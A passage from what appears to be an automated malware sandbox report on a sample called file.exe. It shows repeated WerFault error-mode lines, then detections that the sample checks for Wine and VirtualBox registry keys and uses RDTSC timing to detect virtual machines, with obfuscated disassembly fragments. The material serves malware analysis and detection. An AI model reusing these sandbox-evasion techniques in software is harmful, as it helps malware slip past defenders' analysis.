    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B97D second address: 73B98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B98C second address: 73B990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B990 second address: 73B994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725AB2 second address: 725AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8E4CE84BF6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725AC0 second address: 725AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B1ED second address: 73B232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F8E4CE84BF6h 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007F8E4CE84BF6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F8E4CE84C0Ah 0x00000020 jmp 00007F8E4CE84C04h 0x00000025 jmp 00007F8E4CE84C01h 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B232 second address: 73B23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B23A second address: 73B23E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B23E second address: 73B247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D833 second address: 73D839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D936 second address: 73D978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F8E4CB125D6h 0x0000000f pop ecx 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a je 00007F8E4CB125C6h 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D978 second address: 73D97D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DAA1 second address: 73DAB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DAB7 second address: 73DAC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DAC4 second address: 73DB4E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8E4CB125C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c xor edx, 4CEF0B86h 0x00000012 push 00000000h 0x00000014 add dword ptr [ebp+122D275Ah], ebx 0x0000001a push 5272977Dh 0x0000001f pushad 0x00000020 jno 00007F8E4CB125C8h 0x00000026 js 00007F8E4CB125DDh 0x0000002c jmp 00007F8E4CB125D7h 0x00000031 popad 0x00000032 xor dword ptr [esp], 527297FDh 0x00000039 add dword ptr [ebp+122D23F0h], edx 0x0000003f push 00000003h 0x00000041 pushad 0x00000042 sub dword ptr [ebp+122D1D77h], ecx 0x00000048 jmp 00007F8E4CB125D3h 0x0000004d popad 0x0000004e push 00000000h 0x00000050 mov ecx, 46BD3A24h 0x00000055 push 00000003h 0x00000057 ja 00007F8E4CB125C7h 0x0000005d push D37FF72Fh 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DB4E second address: 73DB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E4CE84BFDh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DC8D second address: 73DD59 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8E4CB125C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F8E4CB125CEh 0x00000018 popad 0x00000019 pop esi 0x0000001a mov eax, dword ptr [eax] 0x0000001c jnl 00007F8E4CB125D9h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 jnl 00007F8E4CB125DAh 0x0000002c pop eax 0x0000002d mov dword ptr [ebp+122D2755h], edi 0x00000033 push 00000003h 0x00000035 mov esi, dword ptr [ebp+122D2E14h] 0x0000003b mov dword ptr [ebp+122D2682h], ecx 0x00000041 push 00000000h 0x00000043 add cx, 8C49h 0x00000048 push 00000003h 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F8E4CB125C8h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 call 00007F8E4CB125C9h 0x00000069 jmp 00007F8E4CB125CFh 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 pushad 0x00000073 popad 0x00000074 jmp 00007F8E4CB125D3h 0x00000079 popad 0x0000007a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DD59 second address: 73DD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DD5F second address: 73DD75 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8E4CB125C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edi 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DD75 second address: 73DDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F8E4CE84C08h 0x00000011 popad 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jbe 00007F8E4CE84C00h 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D425 second address: 75D429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DA07 second address: 75DA25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F8E4CE84C08h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DA25 second address: 75DA37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DA37 second address: 75DA3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DCB7 second address: 75DCDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F8E4CB125D5h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F8E4CB125C6h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DCDB second address: 75DCEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c jnc 00007F8E4CE84C02h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75DCEF second address: 75DCF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E0DD second address: 75E0E7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8E4CE84BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E26A second address: 75E26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E26E second address: 75E272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E272 second address: 75E27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E418 second address: 75E41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E41E second address: 75E439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8E4CB125C6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push ecx 0x0000000e jmp 00007F8E4CB125CBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E439 second address: 75E452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8E4CE84C02h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E452 second address: 75E460 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E5CA second address: 75E5EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F8E4CE84BFBh 0x0000000d jc 00007F8E4CE84BFCh 0x00000013 jns 00007F8E4CE84BF6h 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7558D1 second address: 7558D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7558D7 second address: 7558F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84C08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734BCC second address: 734C27 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8E4CB125C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F8E4CB125CFh 0x00000013 push ecx 0x00000014 jmp 00007F8E4CB125CAh 0x00000019 jmp 00007F8E4CB125CBh 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F8E4CB125CDh 0x00000026 jmp 00007F8E4CB125D8h 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734C27 second address: 734C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E77A second address: 75E77E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E77E second address: 75E794 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8E4CE84BFEh 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F8E4CE84BF6h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73155A second address: 73155E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73155E second address: 73157F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8E4CE84C04h 0x0000000d push edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A5AD second address: 76A5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A5B3 second address: 76A5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A5BB second address: 76A5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A5C0 second address: 76A5E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84C09h 0x00000007 push ecx 0x00000008 jnc 00007F8E4CE84BF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769D30 second address: 769D75 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8E4CB125D7h 0x00000008 jmp 00007F8E4CB125D8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 jmp 00007F8E4CB125CEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769D75 second address: 769D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769ECD second address: 769ED2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A2DE second address: 76A2FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8E4CE84C09h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76B483 second address: 76B488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76B583 second address: 76B5A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F8E4CE84C02h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76B783 second address: 76B787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76B787 second address: 76B790 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76B9C2 second address: 76B9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C1CB second address: 76C1CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C62D second address: 76C631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C631 second address: 76C63B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8E4CE84BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C7C5 second address: 76C7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F8E4CB125CCh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C7DA second address: 76C7E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C7E0 second address: 76C7E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CCA0 second address: 76CD28 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8E4CE84BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D1F86h], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F8E4CE84BF8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 call 00007F8E4CE84C07h 0x00000035 mov edi, dword ptr [ebp+122D1C49h] 0x0000003b pop esi 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007F8E4CE84BF8h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 00000015h 0x00000053 inc eax 